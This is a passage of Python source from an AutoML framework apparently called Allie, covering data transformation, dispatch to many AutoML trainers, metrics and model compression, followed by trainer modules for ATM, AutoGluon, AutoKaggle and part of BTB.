if basefile+'_train.csv' not in temp_listdir:
train_data= convert_csv(X_train, y_train, labels_, mtype, classes)
train_data.to_csv(basefile+'_train.csv',index=False)
created_csv_files.append(basefile+'_train.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_train.csv'))
try:
print(basefile+'_test.csv'.upper())
if basefile+'_test.csv' not in temp_listdir:
test_data= convert_csv(X_test, y_test, labels_, mtype, classes)
test_data.to_csv(basefile+'_test.csv',index=False)
created_csv_files.append(basefile+'_test.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_test.csv'))
############################################################
## DATA TRANSFORMATION ##
############################################################
'''
Scale features via scalers, dimensionality reduction techniques,
and feature selection strategies per the settings.json document.
'''
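# For reference, the settings.json fields read below look roughly like this
# (illustrative values only - the actual defaults live in settings.json):
#   "scale_features": true, "default_scaler": ["standard_scaler"],
#   "reduce_dimensions": false, "default_dimensionality_reducer": ["pca"],
#   "select_features": false, "default_feature_selector": ["rfe"]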
preprocess_dir=prevdir+'/preprocessing'
os.chdir(preprocess_dir)
# get all the important settings for the transformations
scale_features=settings['scale_features']
reduce_dimensions=settings['reduce_dimensions']
select_features=settings['select_features']
default_scalers=settings['default_scaler']
default_reducers=settings['default_dimensionality_reducer']
default_selectors=settings['default_feature_selector']
# get command for terminal
transform_command=''
if problemtype == 'csv' and mtype == 'c':
transform_command=transform_command+' "'+'Class'+'"'
else:
for i in range(len(classes)):
transform_command=transform_command+' "'+classes[i]+'"'
# get filename / create a unique file name
if mtype=='r':
t_filename='r_'+common_name
elif mtype=='c':
t_filename='c_'+common_name
# only add names in if True
if scale_features == True:
for i in range(len(default_scalers)):
t_filename=t_filename+'_'+default_scalers[i]
if reduce_dimensions == True:
for i in range(len(default_reducers)):
t_filename=t_filename+'_'+default_reducers[i]
if select_features == True:
for i in range(len(default_selectors)):
t_filename=t_filename+'_'+default_selectors[i]
transform_file=t_filename+'.pickle'
if scale_features == True or reduce_dimensions == True or select_features == True:
print('----------------------------------')
print(f.renderText('TRANSFORMING DATA'))
print('----------------------------------')
# go to proper transformer directory
try:
os.chdir(problemtype+'_transformer')
except:
os.mkdir(problemtype+'_transformer')
os.chdir(problemtype+'_transformer')
# train transformer if it doesn't already exist
os.system('pip3 install scikit-learn==0.22.2.post1')
if transform_file in os.listdir():
# remove file if in listdir to avoid conflicts with naming
os.remove(transform_file)
print('making transformer...')
alldata=np.asarray(alldata)
labels=np.asarray(labels)
os.chdir(preprocess_dir)
if mtype == 'c':
print('python3 transform.py "%s" "%s" "%s" %s'%(problemtype, 'c', common_name, transform_command))
os.system('python3 transform.py "%s" "%s" "%s" %s'%(problemtype, 'c', common_name, transform_command))
os.chdir(problemtype+'_transformer')
print(transform_file)
transform_model=pickle.load(open(transform_file,'rb'))
alldata=transform_model.transform(np.array(alldata))
elif mtype == 'r':
command='python3 transform.py "%s" "%s" "%s" "%s" "%s" "%s"'%('csv', 'r', classes[0], csvfile, prevdir+'/train_dir/', common_name)
print(command)
os.system(command)
os.chdir(problemtype+'_transformer')
transform_model=pickle.load(open(transform_file,'rb'))
alldata=transform_model.transform(alldata)
os.chdir(preprocess_dir)
os.system('python3 load_transformer.py "%s" "%s"'%(problemtype, transform_file))
# now make new files as .CSV
os.chdir(model_dir)
# split the data
X_train, X_test, y_train, y_test = train_test_split(alldata, labels, test_size=test_size)
# convert to numpy arrays
X_train=np.array(X_train)
X_test=np.array(X_test)
y_train=np.array(y_train)
y_test=np.array(y_test)
# get new labels_ array
labels_=list()
for i in range(len(alldata[0].tolist())):
labels_.append('transformed_feature_%s'%(str(i)))
# now create transformed excel sheets
temp_listdir=os.listdir()
if create_csv == True:
try:
print(basefile+'_all_transformed.csv'.upper())
if basefile+'_all_transformed.csv' not in temp_listdir:
all_data = convert_csv(alldata, labels, labels_, mtype, classes)
all_data.to_csv(basefile+'_all_transformed.csv',index=False)
created_csv_files.append(basefile+'_all_transformed.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_all_transformed.csv'))
try:
print(basefile+'_train_transformed.csv'.upper())
if basefile+'_train_transformed.csv' not in temp_listdir:
train_data= convert_csv(X_train, y_train, labels_, mtype, classes)
train_data.to_csv(basefile+'_train_transformed.csv',index=False)
created_csv_files.append(basefile+'_train_transformed.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_train_transformed.csv'))
try:
print(basefile+'_test_transformed.csv'.upper())
if basefile+'_test_transformed.csv' not in temp_listdir:
test_data= convert_csv(X_test, y_test, labels_, mtype, classes)
test_data.to_csv(basefile+'_test_transformed.csv',index=False)
created_csv_files.append(basefile+'_test_transformed.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_test_transformed.csv'))
else:
# make a transform model == '' so that later during model training this can be skipped
transform_model=''
############################################################
## VISUALIZE DATA ##
############################################################
visualize_data=settings['visualize_data']
visual_dir=prevdir+'/visualize'
model_session=str(uuid.uuid1())
os.chdir(visual_dir)
if visualize_data == True and mtype == 'c':
print('----------------------------------')
print(f.renderText('VISUALIZING DATA'))
print('----------------------------------')
command='python3 visualize.py %s'%(problemtype)
for i in range(len(classes)):
command=command+' "'+classes[i]+'"'
os.system(command)
# restructure the visualization directory
os.chdir(visual_dir+'/visualization_session')
os.mkdir('visualizations')
vizdir=os.getcwd()
# move directories so that visualization is separate from main model directory
shutil.move(vizdir+'/clustering', vizdir+'/visualizations/clustering')
shutil.move(vizdir+'/feature_ranking', vizdir+'/visualizations/feature_ranking')
shutil.move(vizdir+'/model_selection', vizdir+'/visualizations/model_selection')
# go back to main directory
os.chdir(visual_dir)
# now copy the visualization session over to the model session directory
try:
shutil.copytree(visual_dir+'/visualization_session', model_dir+'/'+model_session)
except:
shutil.rmtree(model_dir+'/'+model_session)
shutil.copytree(visual_dir+'/visualization_session', model_dir+'/'+model_session)
# copy over settings.json
shutil.copy(prevdir+'/settings.json',model_dir+'/%s/settings.json'%(model_session))
else:
# make a model session directory for the next section if the visualization step did not create one
os.chdir(model_dir)
try:
os.mkdir(model_session)
except:
shutil.rmtree(model_session)
os.mkdir(model_session)
# copy over settings.json
shutil.copy(prevdir+'/settings.json', model_dir+'/%s/settings.json'%(model_session))
############################################################
## TRAIN THE MODEL ##
############################################################
'''
Now we can train the machine learning model via the default_training script.
Note you can specify multiple training scripts and it will consecutively model the
files appropriately.
#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#
# Here is what all the variables below mean:
#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#
# alldata = list of features in an array for model training
# [[39.0, 112.15384615384616, 70.98195453650514, 248.0, 14.0, 103.0, 143.5546875...],
...
[39.0, 112.15384615384616, 70.98195453650514, 248.0, 14.0, 103.0, 143.5546875,...]]
# labels = list of labels in an array for model training
# ['males','females',...,'males','females']
# mtype = classification or regression problem?
# 'c' --> classification
# 'r' --> regression
# jsonfile = filename of the .JSON document separating classes
# males_females.json
# problemtype = type of problem selected
# 'audio' --> audio files
# 'image' --> images files
# 'text' --> text files
# 'video' --> video files
# 'csv' --> csv files
# default_featurenames = default feature array(s) to use for modeling
# ['librosa_features']
# settings = overall settings currently used for model training
# output of the settings.json document
-----
# transform_model = transformer model if applicable
# useful for data transformation as part of the model initialization process (if pickle file)
# uses scikit-learn pipeline
# X_train, X_test, y_train, y_test
# training datasets used in the .CSV documents
# also can use pandas dataframe if applicable (loading in the model dir)
'''
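# As a concrete illustration of the interface described above, each train_* module called
# below exposes a function of the form (signature taken from the calls in this script):
#   modelname, modeldir, files = train_X(X_train, X_test, y_train, y_test, mtype,
#                                        common_name_model, problemtype, classes,
#                                        default_featurenames, transform_model,
#                                        settings, model_session)
# which trains a model, writes it to disk, and returns the model filename, its directory,
# and any supplementary files to move into the model session folder (autogluon also
# returns its test_data).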
print('----------------------------------')
print(f.renderText('MODELING DATA'))
print('----------------------------------')
# get defaults
default_training_scripts=settings['default_training_script']
model_compress=settings['model_compress']
default_featurenames=''
if problemtype != 'csv' and mtype == 'c':
for i in range(len(default_features)):
if i ==0:
default_featurenames=default_features[i]
else:
default_featurenames=default_featurenames+'_|_'+default_features[i]
else:
default_featurenames='csv_classification'
# just move all created .csv files into model_session directory
os.chdir(model_dir)
os.chdir(model_session)
os.mkdir('data')
for i in range(len(created_csv_files)):
shutil.move(model_dir+'/'+created_csv_files[i], os.getcwd()+'/data/'+created_csv_files[i])
# initialize i (for tqdm) and go through all model training scripts
i=0
for i in tqdm(range(len(default_training_scripts)), desc=default_training_scripts[i]):
try:
model_start_time=time.time()
# go to model directory
os.chdir(model_dir)
# get common name and default training script to select proper model trainer
default_training_script=default_training_scripts[i]
common_name_model=common_name+'_'+default_training_script
model_exists, model_listdir = pursue_modeling(mtype, model_dir, problemtype, default_training_script, common_name_model)
if model_exists == False:
print('----------------------------------')
print(' .... training %s '%(default_training_script.upper()))
print('----------------------------------')
if default_training_script=='adanet':
print('Adanet training is coming soon! Please use a different model setting for now.')
# import train_adanet as ta
# ta.train_adanet(mtype, classes, jsonfile, alldata, labels, feature_labels, problemtype, default_featurenames)
elif default_training_script=='alphapy':
import train_alphapy as talpy
modelname, modeldir, files=talpy.train_alphapy(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='atm':
import train_atm as tatm
modelname, modeldir, files=tatm.train_atm(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autobazaar':
import train_autobazaar as autobzr
modelname, modeldir, files=autobzr.train_autobazaar(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autogbt':
import train_autogbt as tautogbt
modelname, modeldir, files=tautogbt.train_autogbt(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autogluon':
import train_autogluon as tautg
modelname, modeldir, files, test_data=tautg.train_autogluon(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autokaggle':
import train_autokaggle as autokag
modelname, modeldir, files=autokag.train_autokaggle(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autokeras':
import train_autokeras as autokeras_
modelname, modeldir, files=autokeras_.train_autokeras(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='automl':
import train_automl as auto_ml
modelname, modeldir, files=auto_ml.train_automl(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autosklearn':
print('Autosklearn training is unstable! Please use a different model setting for now.')
# import train_autosklearn as taskl
# taskl.train_autosklearn(alldata, labels, mtype, jsonfile, problemtype, default_featurenames)
elif default_training_script=='autopytorch':
import train_autopytorch as autotorch_
modelname, modeldir, files=autotorch_.train_autopytorch(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='btb':
import train_btb as tbtb
modelname, modeldir, files=tbtb.train_btb(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='cvopt':
import train_cvopt as tcvopt
modelname, modeldir, files = tcvopt.train_cvopt(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='devol':
import train_devol as td
modelname, modeldir, files=td.train_devol(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='gama':
import train_gama as tgama
modelname, modeldir, files=tgama.train_gama(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='gentun':
import train_gentun as tgentun
modelname, modeldir, files=tgentun.train_gentun(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='hyperband':
import train_hyperband as thband
modelname, modeldir, files = thband.train_hyperband(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='hypsklearn':
import train_hypsklearn as th
modelname, modeldir, files=th.train_hypsklearn(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='hungabunga':
import train_hungabunga as thung
modelname, modeldir, files=thung.train_hungabunga(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='imbalance':
import train_imbalance as timb
modelname, modeldir, files=timb.train_imbalance(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='keras':
import train_keras as tk
modelname, modeldir, files=tk.train_keras(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='ludwig':
import train_ludwig as tl
modelname, modeldir, files=tl.train_ludwig(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='mlblocks':
import train_mlblocks as mlb
modelname, modeldir, files=mlb.train_mlblocks(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='mlbox':
import train_mlbox as mlbox_
modelname, modeldir, files=mlbox_.train_mlbox(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='neuraxle':
if mtype=='c':
print('Neuraxle does not support classification at this time. Please use a different model training script')
break
else:
import train_neuraxle as tneuraxle
modelname, modeldir, files=tneuraxle.train_neuraxle(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='plda':
print('PLDA training is unstable! Please use a different model setting for now.')
# import train_pLDA as tp
# tp.train_pLDA(alldata,labels)
elif default_training_script=='pytorch':
import train_pytorch as t_pytorch
modelname, modeldir, files = t_pytorch.train_pytorch(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='safe':
import train_safe as tsafe
modelname, modeldir, files=tsafe.train_safe(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='scsr':
import train_scsr as scsr
if mtype == 'c':
modelname, modeldir, files=scsr.train_sc(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,minlength)
elif mtype == 'r':
modelname, modeldir, files=scsr.train_sr(X_train,X_test,y_train,y_test,common_name_model,problemtype,classes,default_featurenames,transform_model,model_dir,settings)
elif default_training_script=='tpot':
import train_TPOT as tt
modelname, modeldir, files=tt.train_TPOT(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
############################################################
## CALCULATE METRICS / PLOT ROC CURVE ##
############################################################
if modelname.endswith('.pickle'):
foldername=modelname[0:-7]
elif modelname.endswith('.h5'):
foldername=modelname[0:-3]
else:
foldername=common_name_model
# copy the folder in case there are multiple models being trained
try:
shutil.copytree(model_session, foldername)
except:
shutil.rmtree(foldername)
shutil.copytree(model_session, foldername)
cur_dir2=os.getcwd()
os.chdir(foldername)
os.mkdir('model')
os.chdir('model')
model_dir_temp=os.getcwd()
# dump transform model to the models directory if necessary
if transform_model == '':
transformer_name=''
else:
# dump the tranform model into the current working directory
transformer_name=modelname.split('.')[0]+'_transform.pickle'
tmodel=open(transformer_name,'wb')
pickle.dump(transform_model, tmodel)
tmodel.close()
# move all supplementary files into model folder
for j in range(len(files)):
shutil.move(modeldir+'/'+files[j], model_dir_temp+'/'+files[j])
# load model for getting metrics
if default_training_script not in ['alphapy', 'atm', 'autokeras', 'autopytorch', 'ludwig', 'keras', 'devol']:
loadmodel=open(modelname, 'rb')
clf=pickle.load(loadmodel)
loadmodel.close()
elif default_training_script == 'atm':
from atm import Model
clf=Model.load(modelname)
elif default_training_script == 'autokeras':
import tensorflow as tf
import autokeras as ak
clf = pickle.load(open(modelname, 'rb'))
elif default_training_script=='autopytorch':
import torch
clf=torch.load(modelname)
elif default_training_script == 'ludwig':
from ludwig.api import LudwigModel
clf=LudwigModel.load('ludwig_files/experiment_run/model/')
elif default_training_script in ['devol', 'keras']:
from keras.models import load_model
clf = load_model(modelname)
else:
clf=''
# create test_data variable for anything other than autogluon
if default_training_script != 'autogluon':
test_data=''
# now make main .JSON file for the session summary with metrics
get_metrics(clf, problemtype, mtype, default_training_script, common_name, X_test, y_test, classes, modelname, settings, model_session, transformer_name, created_csv_files, test_data, model_start_time)
# now move to the proper models directory
os.chdir(model_dir)
os.system('python3 create_readme.py "%s"'%(os.getcwd()+'/'+foldername))
try:
os.chdir(problemtype+'_models')
except:
os.mkdir(problemtype+'_models')
os.chdir(problemtype+'_models')
shutil.move(model_dir+'/'+foldername, os.getcwd()+'/'+foldername)
############################################################
## COMPRESS MODELS ##
############################################################
if model_compress == True:
print(f.renderText('COMPRESSING MODEL'))
# now compress the model according to model type
if default_training_script in ['hypsklearn', 'scsr', 'tpot']:
# all .pickle files and can compress via scikit-small-ensemble
from sklearn.externals import joblib
# open up model
loadmodel=open(modelname, 'rb')
model = pickle.load(loadmodel)
loadmodel.close()
# compress - from 0 to 9. Higher value means more compression, but also slower read and write times.
# Using a value of 3 is often a good compromise.
joblib.dump(model, modelname[0:-7]+'_compressed.joblib',compress=3)
# can now load compressed models as such
# thenewmodel=joblib.load(modelname[0:-7]+'_compressed.joblib')
# leads to up to a 10x reduction in model size and roughly 3-4x faster model loading (e.g. 0.72 sec --> 0.23 sec)
# note: this may not work if the scikit-learn / python versions differ between the saving and loading environments.
elif default_training_script in ['devol', 'keras']:
# can compress with keras_compressor
import logging
from keras.models import load_model
from keras_compressor.compressor import compress
logging.basicConfig(
level=logging.INFO,
)
try:
print('compressing model!!')
model = load_model(modelname)
model = compress(model, 7e-1)
model.save(modelname[0:-3]+'_compressed.h5')
except:
print('error compressing model!!')
else:
# for everything else, we can compress pocketflow models in the future.
print('We cannot currently compress %s models. We are working on this!! \n\n The model will remain uncompressed for now'%(default_training_script))
else:
if mtype == 'r':
print('SKIPPING MODELTYPE - %s already exists in the %s folder: %s'%(common_name_model+'_regression', problemtype+'_models', str(model_listdir)))
elif mtype == 'c':
print('SKIPPING MODELTYPE - %s already exists in the %s folder: %s'%(common_name_model+'_classifier', problemtype+'_models', str(model_listdir)))
############################################################
## PRODUCTIONIZING MODELS ##
############################################################
# TO BE COMPLETED IN THE FUTURE!
except:
print('ERROR - error in modeling session')
```
#### File: allie/training/train_atm.py
```python
import pandas as pd
import os, sys, pickle, json, random, shutil, time
os.system('pip3 install atm==0.2.2')
os.system('pip3 install pandas==0.24.2')
import numpy as np
from atm import ATM
def convert_(X_train, y_train):
feature_list=list()
for i in range(len(X_train[0])):
feature_list.append('feature_'+str(i))
feature_list.append('class')
data=dict()
for i in range(len(X_train)):
for j in range(len(feature_list)-1):
if i > 0:
try:
data[feature_list[j]]=data[feature_list[j]]+[X_train[i][j]]
except:
pass
else:
data[feature_list[j]]=[X_train[i][j]]
print(data)
data['class']=y_train
data=pd.DataFrame(data, columns = list(data))
return data
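# Usage sketch with made-up values: convert_([[0.1, 0.2], [0.3, 0.4]], [0, 1]) returns a
# pandas DataFrame with columns feature_0, feature_1, class - the flat tabular layout ATM expects.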
def train_atm(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
# create file names
model_name=common_name_model+'.pickle'
csvname=common_name_model.split('_')[0]
files=list()
# initialize and train classifier
atm = ATM()
# create a temporary directory for all models
curdir=os.getcwd()
try:
os.mkdir('atm_temp')
os.chdir('atm_temp')
except:
shutil.rmtree('atm_temp')
os.mkdir('atm_temp')
os.chdir('atm_temp')
try:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train_transformed.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test_transformed.csv',os.getcwd()+'/test.csv')
except:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test.csv',os.getcwd()+'/test.csv')
# train models
results = atm.run(train_path='train.csv', class_column='class_')
data_results_=str(results.describe())
bestclassifier=str(results.get_best_classifier())
scores=str(results.get_scores())
# export classifier / transfer to model directory
results.export_best_classifier(model_name, force=True)
shutil.move(os.getcwd()+'/'+model_name, curdir+'/'+model_name)
files.append('atm_temp')
files.append(model_name)
files.append('atm.db')
os.chdir(curdir)
model_dir=os.getcwd()
return model_name, model_dir, files
```
#### File: allie/training/train_autogluon.py
```python
import os
# install dependencies
os.system('pip3 install autogluon==0.0.6')
os.system('pip3 install pillow==7.0.0')
os.system('pip3 install numpy==1.18.4')
from autogluon import TabularPrediction as task
import pandas as pd
import os, sys, pickle, json, random, shutil, time
import numpy as np
def convert_gluon(X_train, y_train):
feature_list=list()
for i in range(len(X_train[0])):
feature_list.append('feature_'+str(i))
feature_list.append('class')
data=dict()
for i in range(len(X_train)):
for j in range(len(feature_list)-1):
if i > 0:
try:
data[feature_list[j]]=data[feature_list[j]]+[X_train[i][j]]
except:
pass
else:
data[feature_list[j]]=[X_train[i][j]]
print(data)
data['class']=y_train
data=pd.DataFrame(data, columns = list(data))
data=task.Dataset(data)
return data
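# Same tabular layout as the helper above (feature_0 ... feature_N, class), but wrapped in
# task.Dataset so that autogluon's task.fit can consume it directly.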
def train_autogluon(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
# get train and test data
train_data = convert_gluon(X_train, y_train)
test_data = convert_gluon(X_test, y_test)
predictor = task.fit(train_data=train_data, label='class')
# get summary
results = predictor.fit_summary(verbosity=3)
# get model name
files=list()
model_name=common_name_model+'.pickle'
# pickle store classifier
f=open(model_name,'wb')
pickle.dump(predictor, f)
f.close()
# now rename current directory with models (keep this info in a folder)
files.append(model_name)
files.append('AutogluonModels')
files.append('catboost_info')
files.append('dask-worker-space')
# get model_name
model_dir=os.getcwd()
return model_name, model_dir, files, test_data
```
#### File: allie/training/train_autokaggle.py
```python
import os, pickle
curdir=os.getcwd()
print(os.getcwd())
print('initializing installation')
os.system('pip3 install autokaggle==0.1.0')
os.system('pip3 install scikit-learn==0.22')
from autokaggle.tabular_supervised import TabularClassifier
from autokaggle.tabular_supervised import TabularRegressor
os.chdir(curdir)
def train_autokaggle(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
model_name=common_name_model+'.pickle'
files=list()
if mtype in ['classification', 'c']:
# fit classifier
clf = TabularClassifier()
clf.fit(X_train, y_train, time_limit=12 * 60 * 60)
# SAVE ML MODEL
modelfile=open(model_name,'wb')
pickle.dump(clf, modelfile)
modelfile.close()
elif mtype in ['regression', 'r']:
print("Starting AutoKaggle")
clf = TabularRegressor()
clf.fit(X_train, y_train, time_limit=12 * 60 * 60)
# saving model
print('saving model')
modelfile=open(model_name,'wb')
pickle.dump(clf, modelfile)
modelfile.close()
model_dir=os.getcwd()
files.append(model_name)
return model_name, model_dir, files
```
#### File: allie/training/train_btb.py
```python
import warnings, datetime, uuid, os, json, shutil, pickle
warnings.filterwarnings('ignore')
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score, mean_squared_error
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.model_selection import cross_val_score
from sklearn.metrics import make_scorer
import pandas as pd
os.system('pip3 install baytune==0.3.7')
# os.system('pip3 install autobazaar==0.2.0')
# os.system('pip3 install gitpython==3.0.2')
# os.system('pip3 install --upgrade GitPython==2.1.15')
# os.system('pip3 install --upgrade gitdb2==2.0.6 gitdb==0.6.4 ')
# make imports
print('installing package configuration')
from btb.session import BTBSession
from btb.tuning import Tunable
from btb.tuning.tuners import GPTuner
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import make_scorer, r2_score
from sklearn.model_selection import cross_val_score
from sklearn.svm import SVC
from btb.selection import UCB1
from btb.tuning.hyperparams import FloatHyperParam, IntHyperParam
'''
Taken from the example here:
https://github.com/HDI-Project/BTB/blob/master/notebooks/BTBSession%20-%20Example.ipynb
Note that autobazaar is used as the primary model trainer for BTB sessions.
https://github.com/HDI-Project/AutoBazaar
Tutorial:
https://hdi-project.github.io/AutoBazaar/readme.html#install
Data: Must be formatted (https://github.com/mitll/d3m-schema/blob/master/documentation/datasetSchema.md)
Case 1: Single table
In many openml and other tabular cases, all the learning data is contained in a single tabular file. In this case, an example dataset will look like the following.
<dataset_id>/
|-- tables/
|-- learningData.csv
d3mIndex,sepalLength,sepalWidth,petalLength,petalWidth,species
0,5.2,3.5,1.4,0.2,I.setosa
1,4.9,3.0,1.4,0.2,I.setosa
2,4.7,3.2,1.3,0.2,I.setosa
3,4.6,3.1,1.5,0.2,I.setosa
4,5.0,3.6,1.4,0.3,I.setosa
5,5.4,3.5,1.7,0.4,I.setosa
...
'''
def create_json(foldername, trainingcsv):
# create the template .JSON file necessary for the featurization
dataset_name=foldername
dataset_id=str(uuid.uuid4())
columns=list()
colnames=list(pd.read_csv(trainingcsv))
for i in range(len(colnames)):
if colnames[i] != 'class_':
columns.append({"colIndex": i,
"colName": colnames[i],
"colType": "real",
"role": ["attribute"]})
else:
columns.append({"colIndex": i,
"colName": 'class_',
"colType": "real",
"role": ["suggestedTarget"]})
data={"about":
{
"datasetID": dataset_id,
"datasetName":dataset_name,
"humanSubjectsResearch": False,
"license":"CC",
"datasetSchemaVersion":"3.0",
"redacted":False
},
"dataResources":
[
{
"resID": "0",
"resPath": os.getcwd()+'/'+trainingcsv,
"resType": "table",
"resFormat": ["text/csv"],
"isCollection": False,
"columns":columns,
}
]
}
filename='datasetDoc.json'
jsonfile=open(filename,'w')
json.dump(data,jsonfile)
jsonfile.close()
return dataset_id, filename
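# Usage sketch: dataset_id, filename = create_json('btb_session', 'train.csv') writes
# datasetDoc.json describing train.csv in the (simplified) d3m single-table schema shown above
# and returns the generated dataset id together with the json filename.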
def train_btb(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
# create file names
model_name=common_name_model+'.pickle'
folder='btb_session'
csvname=common_name_model.split('_')[0]
curdir=os.getcwd()
files=list()
# make a temporary folder for the training session
try:
os.mkdir(folder)
os.chdir(folder)
except:
shutil.rmtree(folder)
os.mkdir(folder)
os.chdir(folder)
# get training and testing data
try:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train_transformed.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test_transformed.csv',os.getcwd()+'/test.csv')
except:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test.csv',os.getcwd()+'/test.csv')
# create required .JSON
dataset_id, filename=create_json(folder, 'train.csv')
os.mkdir(dataset_id)
os.chdir(dataset_id)
os.mkdir('tables')
shutil.copy(curdir+'/'+folder+'/train.csv', os.getcwd()+'/tables/train.csv')
if mtype=='c':
def build_model(name, hyperparameters):
model_class = models[name]
return model_class(random_state=0, **hyperparameters)
def score_model(name, hyperparameters):
model = build_model(name, hyperparameters)
scores = cross_val_score(model, X_train, y_train)
return scores.mean()
rf_hyperparams = {'n_estimators': IntHyperParam(min=10, max=500),
'max_depth': IntHyperParam(min=10, max=500)}
rf_tunable = Tunable(rf_hyperparams)
print(rf_tunable)
svc_hyperparams = {'C': FloatHyperParam(min=0.01, max=10.0),
'gamma': FloatHyperParam(0.000000001, 0.0000001)}
svc_tunable = Tunable(svc_hyperparams)
print(svc_tunable)
tuners = {'RF': rf_tunable,
'SVC': svc_tunable}
print(tuners)
models = {'RF': RandomForestClassifier,
'SVC': SVC}
selector = UCB1(['RF', 'SVC'])
session = BTBSession(tuners, score_model, verbose=True)
best_proposal = session.run(iterations=100)
best_model = build_model(best_proposal['name'], best_proposal['config'])
best_model.fit(X_train, y_train)
accuracy = best_model.score(X_test, y_test)
# tuner.record(parameters, score)
print('ACCURACY:')
print(accuracy)
# now save the model in .pickle
os.chdir(curdir)
f=open(model_name,'wb')
pickle.dump(best_model, f)
f.close()
elif mtype == 'r':
tunables = {
'random_forest': {
'n_estimators': {'type': 'int', 'default': 2, 'range': [1, 1000]},
'max_features': {'type': 'str', 'default': 'log2', 'range': [None, 'auto', 'log2', 'sqrt']},
'min_samples_split': {'type': 'int', 'default': 2, 'range': [2, 20]},
'min_samples_leaf': {'type': 'int', 'default': 2, 'range': [1, 20]},
},
'extra_trees': {
'n_estimators': {'type': 'int', 'default': 2, 'range': [1, 1000]},
'max_features': {'type': 'str', 'default': 'log2', 'range': [None, 'auto', 'log2', 'sqrt']},
'min_samples_split': {'type': 'int', 'default': 2, 'range': [2, 20]},
'min_samples_leaf': {'type': 'int', 'default': 2, 'range': [1, 20]},
}
}
models = {
'random_forest': RandomForestRegressor,
'extra_trees': ExtraTreesRegressor,
}
def build_model(name, hyperparameters):
model_class = models[name]
return model_class(random_state=0, **hyperparameters)
def score_model(name, hyperparameters):
model = build_model(name, hyperparameters)
r2_scorer = make_scorer(r2_score)
